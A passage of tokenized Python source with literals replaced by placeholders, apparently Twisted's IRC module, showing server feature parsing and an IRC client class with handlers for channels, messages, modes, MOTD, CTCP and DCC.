sendLine ( "<STR_LIT>" % ( who , where ) ) <EOL> def part ( self , who , where , reason = None ) : <EOL> """<STR_LIT>""" <EOL> if reason : <EOL> self . sendLine ( "<STR_LIT>" % ( who , where , reason ) ) <EOL> else : <EOL> self . sendLine ( "<STR_LIT>" % ( who , where ) ) <EOL> def channelMode ( self , user , channel , mode , * args ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( "<STR_LIT>" % ( <EOL> self . hostname , RPL_CHANNELMODEIS , user , channel , mode , '<STR_LIT:U+0020>' . join ( args ) ) ) <EOL> class ServerSupportedFeatures ( _CommandDispatcherMixin ) : <EOL> """<STR_LIT>""" <EOL> prefix = '<STR_LIT>' <EOL> def __init__ ( self ) : <EOL> self . _features = { <EOL> '<STR_LIT>' : <NUM_LIT:200> , <EOL> '<STR_LIT>' : tuple ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : <NUM_LIT:9> , <EOL> '<STR_LIT>' : self . _parsePrefixParam ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : self . _parseChanModesParam ( [ '<STR_LIT:b>' , '<STR_LIT>' , '<STR_LIT>' ] ) } <EOL> def _splitParamArgs ( cls , params , valueProcessor = None ) : <EOL> """<STR_LIT>""" <EOL> if valueProcessor is None : <EOL> valueProcessor = lambda x : x <EOL> def _parse ( ) : <EOL> for param in params : <EOL> if '<STR_LIT::>' not in param : <EOL> param += '<STR_LIT::>' <EOL> a , b = param . split ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> yield a , valueProcessor ( b ) <EOL> return list ( _parse ( ) ) <EOL> _splitParamArgs = classmethod ( _splitParamArgs ) <EOL> def _unescapeParamValue ( cls , value ) : <EOL> """<STR_LIT>""" <EOL> def _unescape ( ) : <EOL> parts = value . split ( '<STR_LIT>' ) <EOL> yield parts . pop ( <NUM_LIT:0> ) <EOL> for s in parts : <EOL> octet , rest = s [ : <NUM_LIT:2> ] , s [ <NUM_LIT:2> : ] <EOL> try : <EOL> octet = int ( octet , <NUM_LIT:16> ) <EOL> except ValueError : <EOL> raise ValueError ( '<STR_LIT>' % ( octet , ) ) <EOL> yield chr ( octet ) + rest <EOL> if '<STR_LIT>' not in value : <EOL> return value <EOL> return '<STR_LIT>' . 
join ( _unescape ( ) ) <EOL> _unescapeParamValue = classmethod ( _unescapeParamValue ) <EOL> def _splitParam ( cls , param ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT:=>' not in param : <EOL> param += '<STR_LIT:=>' <EOL> key , value = param . split ( '<STR_LIT:=>' , <NUM_LIT:1> ) <EOL> return key , map ( cls . _unescapeParamValue , value . split ( '<STR_LIT:U+002C>' ) ) <EOL> _splitParam = classmethod ( _splitParam ) <EOL> def _parsePrefixParam ( cls , prefix ) : <EOL> """<STR_LIT>""" <EOL> if not prefix : <EOL> return None <EOL> if prefix [ <NUM_LIT:0> ] != '<STR_LIT:(>' and '<STR_LIT:)>' not in prefix : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> modes , symbols = prefix . split ( '<STR_LIT:)>' , <NUM_LIT:1> ) <EOL> symbols = zip ( symbols , xrange ( len ( symbols ) ) ) <EOL> modes = modes [ <NUM_LIT:1> : ] <EOL> return dict ( zip ( modes , symbols ) ) <EOL> _parsePrefixParam = classmethod ( _parsePrefixParam ) <EOL> def _parseChanModesParam ( self , params ) : <EOL> """<STR_LIT>""" <EOL> names = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if len ( params ) > len ( names ) : <EOL> raise ValueError ( <EOL> '<STR_LIT>' % ( <EOL> len ( names ) , len ( params ) ) ) <EOL> items = map ( lambda key , value : ( key , value or '<STR_LIT>' ) , names , params ) <EOL> return dict ( items ) <EOL> _parseChanModesParam = classmethod ( _parseChanModesParam ) <EOL> def getFeature ( self , feature , default = None ) : <EOL> """<STR_LIT>""" <EOL> return self . _features . get ( feature , default ) <EOL> def hasFeature ( self , feature ) : <EOL> """<STR_LIT>""" <EOL> return self . getFeature ( feature ) is not None <EOL> def parse ( self , params ) : <EOL> """<STR_LIT>""" <EOL> for param in params : <EOL> key , value = self . _splitParam ( param ) <EOL> if key . startswith ( '<STR_LIT:->' ) : <EOL> self . _features . pop ( key [ <NUM_LIT:1> : ] , None ) <EOL> else : <EOL> self . _features [ key ] = self . 
dispatch ( key , value ) <EOL> def isupport_unknown ( self , command , params ) : <EOL> """<STR_LIT>""" <EOL> return tuple ( params ) <EOL> def isupport_CHANLIMIT ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return self . _splitParamArgs ( params , _intOrDefault ) <EOL> def isupport_CHANMODES ( self , params ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return self . _parseChanModesParam ( params ) <EOL> except ValueError : <EOL> return self . getFeature ( '<STR_LIT>' ) <EOL> def isupport_CHANNELLEN ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return _intOrDefault ( params [ <NUM_LIT:0> ] , self . getFeature ( '<STR_LIT>' ) ) <EOL> def isupport_CHANTYPES ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return tuple ( params [ <NUM_LIT:0> ] ) <EOL> def isupport_EXCEPTS ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return params [ <NUM_LIT:0> ] or '<STR_LIT:e>' <EOL> def isupport_IDCHAN ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return self . _splitParamArgs ( params ) <EOL> def isupport_INVEX ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return params [ <NUM_LIT:0> ] or '<STR_LIT:I>' <EOL> def isupport_KICKLEN ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return _intOrDefault ( params [ <NUM_LIT:0> ] ) <EOL> def isupport_MAXLIST ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return self . _splitParamArgs ( params , _intOrDefault ) <EOL> def isupport_MODES ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return _intOrDefault ( params [ <NUM_LIT:0> ] ) <EOL> def isupport_NETWORK ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return params [ <NUM_LIT:0> ] <EOL> def isupport_NICKLEN ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return _intOrDefault ( params [ <NUM_LIT:0> ] , self . getFeature ( '<STR_LIT>' ) ) <EOL> def isupport_PREFIX ( self , params ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return self . _parsePrefixParam ( params [ <NUM_LIT:0> ] ) <EOL> except ValueError : <EOL> return self . 
getFeature ( '<STR_LIT>' ) <EOL> def isupport_SAFELIST ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return True <EOL> def isupport_STATUSMSG ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return params [ <NUM_LIT:0> ] <EOL> def isupport_TARGMAX ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return dict ( self . _splitParamArgs ( params , _intOrDefault ) ) <EOL> def isupport_TOPICLEN ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return _intOrDefault ( params [ <NUM_LIT:0> ] ) <EOL> class IRCClient ( basic . LineReceiver ) : <EOL> """<STR_LIT>""" <EOL> hostname = None <EOL> motd = None <EOL> nickname = '<STR_LIT>' <EOL> password = None <EOL> realname = None <EOL> username = None <EOL> userinfo = None <EOL> fingerReply = None <EOL> versionName = None <EOL> versionNum = None <EOL> versionEnv = None <EOL> sourceURL = "<STR_LIT>" <EOL> dcc_destdir = '<STR_LIT:.>' <EOL> dcc_sessions = None <EOL> performLogin = <NUM_LIT:1> <EOL> lineRate = None <EOL> _queue = None <EOL> _queueEmptying = None <EOL> delimiter = '<STR_LIT:\n>' <EOL> __pychecker__ = '<STR_LIT>' <EOL> _registered = False <EOL> _attemptedNick = '<STR_LIT>' <EOL> erroneousNickFallback = '<STR_LIT>' <EOL> _heartbeat = None <EOL> heartbeatInterval = <NUM_LIT> <EOL> def _reallySendLine ( self , line ) : <EOL> return basic . LineReceiver . sendLine ( self , lowQuote ( line ) + '<STR_LIT:\r>' ) <EOL> def sendLine ( self , line ) : <EOL> if self . lineRate is None : <EOL> self . _reallySendLine ( line ) <EOL> else : <EOL> self . _queue . append ( line ) <EOL> if not self . _queueEmptying : <EOL> self . _sendLine ( ) <EOL> def _sendLine ( self ) : <EOL> if self . _queue : <EOL> self . _reallySendLine ( self . _queue . pop ( <NUM_LIT:0> ) ) <EOL> self . _queueEmptying = reactor . callLater ( self . lineRate , <EOL> self . _sendLine ) <EOL> else : <EOL> self . _queueEmptying = None <EOL> def connectionLost ( self , reason ) : <EOL> basic . LineReceiver . connectionLost ( self , reason ) <EOL> self . 
stopHeartbeat ( ) <EOL> def _createHeartbeat ( self ) : <EOL> """<STR_LIT>""" <EOL> return task . LoopingCall ( self . _sendHeartbeat ) <EOL> def _sendHeartbeat ( self ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( '<STR_LIT>' + self . hostname ) <EOL> def stopHeartbeat ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _heartbeat is not None : <EOL> self . _heartbeat . stop ( ) <EOL> self . _heartbeat = None <EOL> def startHeartbeat ( self ) : <EOL> """<STR_LIT>""" <EOL> self . stopHeartbeat ( ) <EOL> if self . heartbeatInterval is None : <EOL> return <EOL> self . _heartbeat = self . _createHeartbeat ( ) <EOL> self . _heartbeat . start ( self . heartbeatInterval , now = False ) <EOL> def created ( self , when ) : <EOL> """<STR_LIT>""" <EOL> def yourHost ( self , info ) : <EOL> """<STR_LIT>""" <EOL> def myInfo ( self , servername , version , umodes , cmodes ) : <EOL> """<STR_LIT>""" <EOL> def luserClient ( self , info ) : <EOL> """<STR_LIT>""" <EOL> def bounce ( self , info ) : <EOL> """<STR_LIT>""" <EOL> def isupport ( self , options ) : <EOL> """<STR_LIT>""" <EOL> def luserChannels ( self , channels ) : <EOL> """<STR_LIT>""" <EOL> def luserOp ( self , ops ) : <EOL> """<STR_LIT>""" <EOL> def luserMe ( self , info ) : <EOL> """<STR_LIT>""" <EOL> def privmsg ( self , user , channel , message ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def joined ( self , channel ) : <EOL> """<STR_LIT>""" <EOL> def left ( self , channel ) : <EOL> """<STR_LIT>""" <EOL> def noticed ( self , user , channel , message ) : <EOL> """<STR_LIT>""" <EOL> def modeChanged ( self , user , channel , set , modes , args ) : <EOL> """<STR_LIT>""" <EOL> def pong ( self , user , secs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def signedOn ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def kickedFrom ( self , channel , kicker , message ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def nickChanged ( self , nick ) : <EOL> """<STR_LIT>""" <EOL> self . 
nickname = nick <EOL> def userJoined ( self , user , channel ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def userLeft ( self , user , channel ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def userQuit ( self , user , quitMessage ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def userKicked ( self , kickee , channel , kicker , message ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def action ( self , user , channel , data ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def topicUpdated ( self , user , channel , newTopic ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def userRenamed ( self , oldname , newname ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def receivedMOTD ( self , motd ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def join ( self , channel , key = None ) : <EOL> """<STR_LIT>""" <EOL> if channel [ <NUM_LIT:0> ] not in CHANNEL_PREFIXES : <EOL> channel = '<STR_LIT:#>' + channel <EOL> if key : <EOL> self . sendLine ( "<STR_LIT>" % ( channel , key ) ) <EOL> else : <EOL> self . sendLine ( "<STR_LIT>" % ( channel , ) ) <EOL> def leave ( self , channel , reason = None ) : <EOL> """<STR_LIT>""" <EOL> if channel [ <NUM_LIT:0> ] not in CHANNEL_PREFIXES : <EOL> channel = '<STR_LIT:#>' + channel <EOL> if reason : <EOL> self . sendLine ( "<STR_LIT>" % ( channel , reason ) ) <EOL> else : <EOL> self . sendLine ( "<STR_LIT>" % ( channel , ) ) <EOL> def kick ( self , channel , user , reason = None ) : <EOL> """<STR_LIT>""" <EOL> if channel [ <NUM_LIT:0> ] not in CHANNEL_PREFIXES : <EOL> channel = '<STR_LIT:#>' + channel <EOL> if reason : <EOL> self . sendLine ( "<STR_LIT>" % ( channel , user , reason ) ) <EOL> else : <EOL> self . sendLine ( "<STR_LIT>" % ( channel , user ) ) <EOL> part = leave <EOL> def invite ( self , user , channel ) : <EOL> """<STR_LIT>""" <EOL> if channel [ <NUM_LIT:0> ] not in CHANNEL_PREFIXES : <EOL> channel = '<STR_LIT:#>' + channel <EOL> self . 
sendLine ( "<STR_LIT>" % ( user , channel ) ) <EOL> def topic ( self , channel , topic = None ) : <EOL> """<STR_LIT>""" <EOL> if channel [ <NUM_LIT:0> ] not in CHANNEL_PREFIXES : <EOL> channel = '<STR_LIT:#>' + channel <EOL> if topic != None : <EOL> self . sendLine ( "<STR_LIT>" % ( channel , topic ) ) <EOL> else : <EOL> self . sendLine ( "<STR_LIT>" % ( channel , ) ) <EOL> def mode ( self , chan , set , modes , limit = None , user = None , mask = None ) : <EOL> """<STR_LIT>""" <EOL> if set : <EOL> line = '<STR_LIT>' % ( chan , modes ) <EOL> else : <EOL> line = '<STR_LIT>' % ( chan , modes ) <EOL> if limit is not None : <EOL> line = '<STR_LIT>' % ( line , limit ) <EOL> elif user is not None : <EOL> line = '<STR_LIT>' % ( line , user ) <EOL> elif mask is not None : <EOL> line = '<STR_LIT>' % ( line , mask ) <EOL> self . sendLine ( line ) <EOL> def say ( self , channel , message , length = None ) : <EOL> """<STR_LIT>""" <EOL> if channel [ <NUM_LIT:0> ] not in CHANNEL_PREFIXES : <EOL> channel = '<STR_LIT:#>' + channel <EOL> self . msg ( channel , message , length ) <EOL> def _safeMaximumLineLength ( self , command ) : <EOL> """<STR_LIT>""" <EOL> theoretical = '<STR_LIT>' % ( <EOL> '<STR_LIT:a>' * self . supported . getFeature ( '<STR_LIT>' ) , <EOL> '<STR_LIT:b>' * <NUM_LIT:10> , <EOL> '<STR_LIT:c>' * <NUM_LIT> , <EOL> command ) <EOL> fudge = <NUM_LIT:10> <EOL> return MAX_COMMAND_LENGTH - len ( theoretical ) - fudge <EOL> def msg ( self , user , message , length = None ) : <EOL> """<STR_LIT>""" <EOL> fmt = '<STR_LIT>' % ( user , ) <EOL> if length is None : <EOL> length = self . _safeMaximumLineLength ( fmt ) <EOL> minimumLength = len ( fmt ) + <NUM_LIT:2> <EOL> if length <= minimumLength : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( minimumLength , user ) ) <EOL> for line in split ( message , length - minimumLength ) : <EOL> self . sendLine ( fmt + line ) <EOL> def notice ( self , user , message ) : <EOL> """<STR_LIT>""" <EOL> self . 
sendLine ( "<STR_LIT>" % ( user , message ) ) <EOL> def away ( self , message = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( "<STR_LIT>" % message ) <EOL> def back ( self ) : <EOL> """<STR_LIT>""" <EOL> self . away ( ) <EOL> def whois ( self , nickname , server = None ) : <EOL> """<STR_LIT>""" <EOL> if server is None : <EOL> self . sendLine ( '<STR_LIT>' + nickname ) <EOL> else : <EOL> self . sendLine ( '<STR_LIT>' % ( server , nickname ) ) <EOL> def register ( self , nickname , hostname = '<STR_LIT:foo>' , servername = '<STR_LIT:bar>' ) : <EOL> """<STR_LIT>""" <EOL> if self . password is not None : <EOL> self . sendLine ( "<STR_LIT>" % self . password ) <EOL> self . setNick ( nickname ) <EOL> if self . username is None : <EOL> self . username = nickname <EOL> self . sendLine ( "<STR_LIT>" % ( self . username , hostname , servername , self . realname ) ) <EOL> def setNick ( self , nickname ) : <EOL> """<STR_LIT>""" <EOL> self . _attemptedNick = nickname <EOL> self . sendLine ( "<STR_LIT>" % nickname ) <EOL> def quit ( self , message = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( "<STR_LIT>" % message ) <EOL> def describe ( self , channel , action ) : <EOL> """<STR_LIT>""" <EOL> self . ctcpMakeQuery ( channel , [ ( '<STR_LIT>' , action ) ] ) <EOL> _pings = None <EOL> _MAX_PINGRING = <NUM_LIT:12> <EOL> def ping ( self , user , text = None ) : <EOL> """<STR_LIT>""" <EOL> if self . _pings is None : <EOL> self . _pings = { } <EOL> if text is None : <EOL> chars = string . letters + string . digits + string . punctuation <EOL> key = '<STR_LIT>' . join ( [ random . choice ( chars ) for i in range ( <NUM_LIT:12> ) ] ) <EOL> else : <EOL> key = str ( text ) <EOL> self . _pings [ ( user , key ) ] = time . time ( ) <EOL> self . ctcpMakeQuery ( user , [ ( '<STR_LIT>' , key ) ] ) <EOL> if len ( self . _pings ) > self . _MAX_PINGRING : <EOL> byValue = [ ( v , k ) for ( k , v ) in self . _pings . items ( ) ] <EOL> byValue . 
sort ( ) <EOL> excess = self . _MAX_PINGRING - len ( self . _pings ) <EOL> for i in xrange ( excess ) : <EOL> del self . _pings [ byValue [ i ] [ <NUM_LIT:1> ] ] <EOL> def dccSend ( self , user , file ) : <EOL> if type ( file ) == types . StringType : <EOL> file = open ( file , '<STR_LIT:r>' ) <EOL> size = fileSize ( file ) <EOL> name = getattr ( file , "<STR_LIT:name>" , "<STR_LIT>" % ( id ( file ) , ) ) <EOL> factory = DccSendFactory ( file ) <EOL> port = reactor . listenTCP ( <NUM_LIT:0> , factory , <NUM_LIT:1> ) <EOL> raise NotImplementedError , ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> my_address = struct . pack ( "<STR_LIT>" , my_address ) <EOL> args = [ '<STR_LIT>' , name , my_address , str ( port ) ] <EOL> if not ( size is None ) : <EOL> args . append ( size ) <EOL> args = string . join ( args , '<STR_LIT:U+0020>' ) <EOL> self . ctcpMakeQuery ( user , [ ( '<STR_LIT>' , args ) ] ) <EOL> def dccResume ( self , user , fileName , port , resumePos ) : <EOL> """<STR_LIT>""" <EOL> self . ctcpMakeQuery ( user , [ <EOL> ( '<STR_LIT>' , [ '<STR_LIT>' , fileName , port , resumePos ] ) ] ) <EOL> def dccAcceptResume ( self , user , fileName , port , resumePos ) : <EOL> """<STR_LIT>""" <EOL> self . ctcpMakeQuery ( user , [ <EOL> ( '<STR_LIT>' , [ '<STR_LIT>' , fileName , port , resumePos ] ) ] ) <EOL> def irc_ERR_NICKNAMEINUSE ( self , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> self . _attemptedNick = self . alterCollidedNick ( self . _attemptedNick ) <EOL> self . setNick ( self . _attemptedNick ) <EOL> def alterCollidedNick ( self , nickname ) : <EOL> """<STR_LIT>""" <EOL> return nickname + '<STR_LIT:_>' <EOL> def irc_ERR_ERRONEUSNICKNAME ( self , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> if not self . _registered : <EOL> self . setNick ( self . 
erroneousNickFallback ) <EOL> def irc_ERR_PASSWDMISMATCH ( self , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> raise IRCPasswordMismatch ( "<STR_LIT>" ) <EOL> def irc_RPL_WELCOME ( self , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> self . hostname = prefix <EOL> self . _registered = True <EOL> self . nickname = self . _attemptedNick <EOL> self . signedOn ( ) <EOL> self . startHeartbeat ( ) <EOL> def irc_JOIN ( self , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> nick = string . split ( prefix , '<STR_LIT:!>' ) [ <NUM_LIT:0> ] <EOL> channel = params [ - <NUM_LIT:1> ] <EOL> if nick == self . nickname : <EOL> self . joined ( channel ) <EOL> else : <EOL> self . userJoined ( nick , channel ) <EOL> def irc_PART ( self , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> nick = string . split ( prefix , '<STR_LIT:!>' ) [ <NUM_LIT:0> ] <EOL> channel = params [ <NUM_LIT:0> ] <EOL> if nick == self . nickname : <EOL> self . left ( channel ) <EOL> else : <EOL> self . userLeft ( nick , channel ) <EOL> def irc_QUIT ( self , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> nick = string . split ( prefix , '<STR_LIT:!>' ) [ <NUM_LIT:0> ] <EOL> self . userQuit ( nick , params [ <NUM_LIT:0> ] ) <EOL> def irc_MODE ( self , user , params ) : <EOL> """<STR_LIT>""" <EOL> channel , modes , args = params [ <NUM_LIT:0> ] , params [ <NUM_LIT:1> ] , params [ <NUM_LIT:2> : ] <EOL> if modes [ <NUM_LIT:0> ] not in '<STR_LIT>' : <EOL> modes = '<STR_LIT:+>' + modes <EOL> if channel == self . nickname : <EOL> paramModes = self . getUserModeParams ( ) <EOL> else : <EOL> paramModes = self . getChannelModeParams ( ) <EOL> try : <EOL> added , removed = parseModes ( modes , args , paramModes ) <EOL> except IRCBadModes : <EOL> log . err ( None , '<STR_LIT>' <EOL> '<STR_LIT>' % ( '<STR_LIT:U+0020>' . join ( params ) , ) ) <EOL> else : <EOL> if added : <EOL> modes , params = zip ( * added ) <EOL> self . modeChanged ( user , channel , True , '<STR_LIT>' . 
join ( modes ) , params ) <EOL> if removed : <EOL> modes , params = zip ( * removed ) <EOL> self . modeChanged ( user , channel , False , '<STR_LIT>' . join ( modes ) , params ) <EOL> def irc_PING ( self , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( "<STR_LIT>" % params [ - <NUM_LIT:1> ] ) <EOL> def irc_PRIVMSG ( self , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> user = prefix <EOL> channel = params [ <NUM_LIT:0> ] <EOL> message = params [ - <NUM_LIT:1> ] <EOL> if not message : <EOL> return <EOL> if message [ <NUM_LIT:0> ] == X_DELIM : <EOL> m = ctcpExtract ( message ) <EOL> if m [ '<STR_LIT>' ] : <EOL> self . ctcpQuery ( user , channel , m [ '<STR_LIT>' ] ) <EOL> if not m [ '<STR_LIT>' ] : <EOL> return <EOL> message = string . join ( m [ '<STR_LIT>' ] , '<STR_LIT:U+0020>' ) <EOL> self . privmsg ( user , channel , message ) <EOL> def irc_NOTICE ( self , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> user = prefix <EOL> channel = params [ <NUM_LIT:0> ] <EOL> message = params [ - <NUM_LIT:1> ] <EOL> if message [ <NUM_LIT:0> ] == X_DELIM : <EOL> m = ctcpExtract ( message ) <EOL> if m [ '<STR_LIT>' ] : <EOL> self . ctcpReply ( user , channel , m [ '<STR_LIT>' ] ) <EOL> if not m [ '<STR_LIT>' ] : <EOL> return <EOL> message = string . join ( m [ '<STR_LIT>' ] , '<STR_LIT:U+0020>' ) <EOL> self . noticed ( user , channel , message ) <EOL> def irc_NICK ( self , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> nick = string . split ( prefix , '<STR_LIT:!>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> if nick == self . nickname : <EOL> self . nickChanged ( params [ <NUM_LIT:0> ] ) <EOL> else : <EOL> self . userRenamed ( nick , params [ <NUM_LIT:0> ] ) <EOL> def irc_KICK ( self , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> kicker = string . split ( prefix , '<STR_LIT:!>' ) [ <NUM_LIT:0> ] <EOL> channel = params [ <NUM_LIT:0> ] <EOL> kicked = params [ <NUM_LIT:1> ] <EOL> message = params [ - <NUM_LIT:1> ] <EOL> if string . lower ( kicked ) == string . 
lower ( self . nickname ) : <EOL> self . kickedFrom ( channel , kicker , message ) <EOL> else : <EOL> self . userKicked ( kicked , channel , kicker , message ) <EOL> def irc_TOPIC ( self , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> user = string . split ( prefix , '<STR_LIT:!>' ) [ <NUM_LIT:0> ] <EOL> channel = params [ <NUM_LIT:0> ] <EOL> newtopic = params [ <NUM_LIT:1> ] <EOL> self . topicUpdated ( user , channel , newtopic ) <EOL> def irc_RPL_TOPIC ( self , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> user = string . split ( prefix , '<STR_LIT:!>' ) [ <NUM_LIT:0> ] <EOL> channel = params [ <NUM_LIT:1> ] <EOL> newtopic = params [ <NUM_LIT:2> ] <EOL> self . topicUpdated ( user , channel , newtopic ) <EOL> def irc_RPL_NOTOPIC ( self , prefix , params ) : <EOL> user = string . split ( prefix , '<STR_LIT:!>' ) [ <NUM_LIT:0> ] <EOL> channel = params [ <NUM_LIT:1> ] <EOL> newtopic = "<STR_LIT>" <EOL> self . topicUpdated ( user , channel , newtopic ) <EOL> def irc_RPL_MOTDSTART ( self , prefix , params ) : <EOL> if params [ - <NUM_LIT:1> ] . startswith ( "<STR_LIT>" ) : <EOL> params [ - <NUM_LIT:1> ] = params [ - <NUM_LIT:1> ] [ <NUM_LIT:2> : ] <EOL> self . motd = [ params [ - <NUM_LIT:1> ] ] <EOL> def irc_RPL_MOTD ( self , prefix , params ) : <EOL> if params [ - <NUM_LIT:1> ] . startswith ( "<STR_LIT>" ) : <EOL> params [ - <NUM_LIT:1> ] = params [ - <NUM_LIT:1> ] [ <NUM_LIT:2> : ] <EOL> if self . motd is None : <EOL> self . motd = [ ] <EOL> self . motd . append ( params [ - <NUM_LIT:1> ] ) <EOL> def irc_RPL_ENDOFMOTD ( self , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> motd = self . motd <EOL> self . motd = None <EOL> self . receivedMOTD ( motd ) <EOL> def irc_RPL_CREATED ( self , prefix , params ) : <EOL> self . created ( params [ <NUM_LIT:1> ] ) <EOL> def irc_RPL_YOURHOST ( self , prefix , params ) : <EOL> self . yourHost ( params [ <NUM_LIT:1> ] ) <EOL> def irc_RPL_MYINFO ( self , prefix , params ) : <EOL> info = params [ <NUM_LIT:1> ] . 
split ( None , <NUM_LIT:3> ) <EOL> while len ( info ) < <NUM_LIT:4> : <EOL> info . append ( None ) <EOL> self . myInfo ( * info ) <EOL> def irc_RPL_BOUNCE ( self , prefix , params ) : <EOL> self . bounce ( params [ <NUM_LIT:1> ] ) <EOL> def irc_RPL_ISUPPORT ( self , prefix , params ) : <EOL> args = params [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> self . supported . parse ( args ) <EOL> self . isupport ( args ) <EOL> def irc_RPL_LUSERCLIENT ( self , prefix , params ) : <EOL> self . luserClient ( params [ <NUM_LIT:1> ] ) <EOL> def irc_RPL_LUSEROP ( self , prefix , params ) : <EOL> try : <EOL> self . luserOp ( int ( params [ <NUM_LIT:1> ] ) ) <EOL> except ValueError : <EOL> pass <EOL> def irc_RPL_LUSERCHANNELS ( self , prefix , params ) : <EOL> try : <EOL> self . luserChannels ( int ( params [ <NUM_LIT:1> ] ) ) <EOL> except ValueError : <EOL> pass <EOL> def irc_RPL_LUSERME ( self , prefix , params ) : <EOL> self . luserMe ( params [ <NUM_LIT:1> ] ) <EOL> def irc_unknown ( self , prefix , command , params ) : <EOL> pass <EOL> def ctcpQuery ( self , user , channel , messages ) : <EOL> """<STR_LIT>""" <EOL> seen = set ( ) <EOL> for tag , data in messages : <EOL> method = getattr ( self , '<STR_LIT>' % tag , None ) <EOL> if tag not in seen : <EOL> if method is not None : <EOL> method ( user , channel , data ) <EOL> else : <EOL> self . ctcpUnknownQuery ( user , channel , tag , data ) <EOL> seen . add ( tag ) <EOL> def ctcpUnknownQuery ( self , user , channel , tag , data ) : <EOL> """<STR_LIT>""" <EOL> log . msg ( '<STR_LIT>' % ( user , tag , data ) ) <EOL> def ctcpQuery_ACTION ( self , user , channel , data ) : <EOL> self . action ( user , channel , data ) <EOL> def ctcpQuery_PING ( self , user , channel , data ) : <EOL> nick = string . split ( user , "<STR_LIT:!>" ) [ <NUM_LIT:0> ] <EOL> self . ctcpMakeReply ( nick , [ ( "<STR_LIT>" , data ) ] ) <EOL> def ctcpQuery_FINGER ( self , user , channel , data ) : <EOL> if data is not None : <EOL> self . 
quirkyMessage ( "<STR_LIT>" <EOL> % ( user , data ) ) <EOL> if not self . fingerReply : <EOL> return <EOL> if callable ( self . fingerReply ) : <EOL> reply = self . fingerReply ( ) <EOL> else : <EOL> reply = str ( self . fingerReply ) <EOL> nick = string . split ( user , "<STR_LIT:!>" ) [ <NUM_LIT:0> ] <EOL> self . ctcpMakeReply ( nick , [ ( '<STR_LIT>' , reply ) ] ) <EOL> def ctcpQuery_VERSION ( self , user , channel , data ) : <EOL> if data is not None : <EOL> self . quirkyMessage ( "<STR_LIT>" <EOL> % ( user , data ) ) <EOL> if self . versionName : <EOL> nick = string . split ( user , "<STR_LIT:!>" ) [ <NUM_LIT:0> ] <EOL> self . ctcpMakeReply ( nick , [ ( '<STR_LIT>' , '<STR_LIT>' % <EOL> ( self . versionName , <EOL> self . versionNum or '<STR_LIT>' , <EOL> self . versionEnv or '<STR_LIT>' ) ) ] ) <EOL> def ctcpQuery_SOURCE ( self , user , channel , data ) : <EOL> if data is not None : <EOL> self . quirkyMessage ( "<STR_LIT>" <EOL> % ( user , data ) ) <EOL> if self . sourceURL : <EOL> nick = string . split ( user , "<STR_LIT:!>" ) [ <NUM_LIT:0> ] <EOL> self . ctcpMakeReply ( nick , [ ( '<STR_LIT>' , self . sourceURL ) , <EOL> ( '<STR_LIT>' , None ) ] ) <EOL> def ctcpQuery_USERINFO ( self , user , channel , data ) : <EOL> if data is not None : <EOL> self . quirkyMessage ( "<STR_LIT>" <EOL> % ( user , data ) ) <EOL> if self . userinfo : <EOL> nick = string . split ( user , "<STR_LIT:!>" ) [ <NUM_LIT:0> ] <EOL> self . ctcpMakeReply ( nick , [ ( '<STR_LIT>' , self . userinfo ) ] ) <EOL> def ctcpQuery_CLIENTINFO ( self , user , channel , 